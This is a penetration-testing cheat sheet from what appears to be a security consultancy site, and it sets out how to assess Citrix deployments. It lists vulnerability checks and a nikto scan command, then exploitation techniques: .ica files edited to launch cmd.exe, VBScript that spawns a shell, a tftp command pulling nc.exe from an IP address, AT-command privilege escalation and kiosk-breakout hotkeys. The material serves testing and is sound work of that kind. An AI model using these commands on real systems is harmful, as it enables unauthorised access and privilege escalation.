www.Cloud-Security.us

Address: P.O.Box 291, Purchase, NY 10577
Telephone: 732-763-2814
Email: service@infosecpro.com
Cloud-Security.us

T O P   T H R E A T S :

Abuse of Cloud Computing

Insecure Interfaces and APIs
Malicious Insiders
Shared Technology Issues
Data Loss or Leakage
Account or Service Hijacking
Unknown Risk Profile

VULNERABILITIES:

Common Exploits

Server Specific
Network Specific
CISCO Specific

CITRIX Specific

T E S T I N G   S T E P S

Footprinting
Discovery
Enumeration
Password Craking

Citrix Specific Testing:

Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment/ penetration test of Citrix implementations.

Enumeration

    Scanning

      • CGI abuses
        • NetScaler web management interface ip address cookie disclosure
      • CGI abuses : Cross Site Scripting (XSS)
        • Citrix MetaFrame XP login.asp
        • Citrix NFuse Launch Scripts
        • NetScaler web management XSS
      • Misc.
        • Citrix Published Applications Remote Enumeration
        • NetScaler web management cookie information
      • Service Detection
        • Citrix Licensing Server detection
        • Citrix Server detection
      • Web Servers
        • Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • Unencrypted NetScaler web management interface
      • Windows
        • Citrix Licensing Server License Management Console
        • Citrix Password Manager Agent Secondary Credential Information Disclosurey
        • Citrix Password Manager Service Stored Credentials Disclosure
        • Citrix Presentation Server Remote Code Execution
        • Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service
        • Citrix web interface 4.6, 5.0, 5.0.1 XSS
        • Novell Client TS/ Citrix Session Arbitrary User Profile Invocation
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • NetScaler web management login
        • Unencrypted NetScaler web management interface
    • perl nikto.pl -host ip_address -port port_no.
      • Note: - It is possible to grep all Citrix/ NFuse/ NetScaler vulnerabilities currently housed in the nikto db and create your own db_tests file replacing the local version in nikto\plugins directory should you wish to specifically limit your enumeration to Citrix vulnerabilties. As of 1 Oct 09, there are currently 9 specific tests meeting these requirements.

  • Exploitation

    • Alter default .ica files
      • InitialProgram=cmd.exe
      • InitialProgram=c:\windows\system32\cmd.exe
      • InitialProgram=explorer.exe
    • Enumerate and Connect
      • For applications identified by Citrix-pa-scan
          • Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan)
          • Writes output to pas_results.wri
      • For published applications with a Citrix client when the master browser is non-public.
          • pa-proxy.pl IP_to_proxy_to (i.e. remote server) 127.0.0.1
    • Manual Testing
      • Create Batch File (cmd.bat)
          • cmd.exe
          • echo off
          • command
          • echo on
        • Option Explicit
        • Dim objShell
        • Set objShell = CreateObject("WScript.Shell")
        • objShell.Run "%comspec% /k"
        • WScript.Quit
        • alternative functionality
          • objShell.Run "%comspec% /k c: & dir"
          • objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
          • objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
        • Integrated Kiosk Attack Tool
          • Reconnaissance
          • FileSystem Links
          • Common Dialogs
          • Application Handlers
          • Browser Plugins
          • iKAT Tools
      • AT Command - priviledge escalation
        • AT HH:MM /interactive "cmd.exe"
        • AT HH:MM /interactive %comspec% /k
        • Note: - AT by default runs as system and although enabled for a normal user, will only work with these privileges for an admin, however, still worth a try.

      • Keyboard Shortcuts/ Hotkeys
        • Ctrl + h – View History
        • Ctrl + n – New Browser
        • Shift + Left Click – New Browser
        • Ctrl + o – Internet Address (browse feature)
        • Ctrl + p – Print (to file)
        • Right Click (Shift + F10)
          • Save Image As
          • View Source
        • F1 – Jump to URL
        • SHIFT+F1: Local Task List
        • SHIFT+F2: Toggle Title Bar
        • SHIFT+F3: Close Remote Application
        • CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
        • CTRL+F2: Remote Task List
        • CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
        • ALT+F2: Cycle through programs
        • ALT+PLUS: Alt+TAB
        • ALT+MINUS: ALT+SHIFT+TAB

    Other members of our business group:
    InfoSecPro.com | US-scada.com

    COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED